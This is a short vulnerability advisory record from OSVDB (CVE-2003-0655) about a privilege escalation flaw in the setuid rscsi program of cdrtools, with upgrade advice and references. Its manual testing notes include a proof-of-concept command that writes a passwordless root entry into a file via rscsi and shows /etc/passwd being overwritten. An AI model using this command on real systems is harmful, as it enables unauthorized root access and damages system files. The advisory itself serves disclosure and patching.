cdrtools rscsi Privilege Escalation

2003-08-01T00:00:00
ID OSVDB:6406
Type osvdb
Reporter KF(dotslash@snosoft.com)
Modified 2003-08-01T00:00:00

Description

Vulnerability Description

cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially formatted string is passed to the rscsi program. This flaw may lead to a loss of integrity.

Solution Description

Upgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially formatted string is passed to the rscsi program. This flaw may lead to a loss of integrity.

Manual Testing Notes

elguapo@gentoo elguapo $ echo Cecho -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a" | /opt/schily/sbin/rscsi /tmp/lala Segmentation fault (this segfault is not related to the security issue)

elguapo@gentoo elguapo $ cat /tmp/lala rscsid: user id 1000, name elguapo rmt: stdin is a PIPE r00t::0:0:root:/root:/bin/bash

When attempting to echo this line to the password file we get the following error. Please note that the password file IS still overwritten at this point.

E0 Illegal user id for RSCSI server 0

elguapo@gentoo elguapo $ cat /etc/passwd rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server rscsid:>E 0 (Illegal user id for RSCSI server) []

References:

Vendor URL: http://www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html Security Tracker: 1007368 Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2 Keyword: suid ISS X-Force ID: 12802 CVE-2003-0655 Bugtraq ID: 8328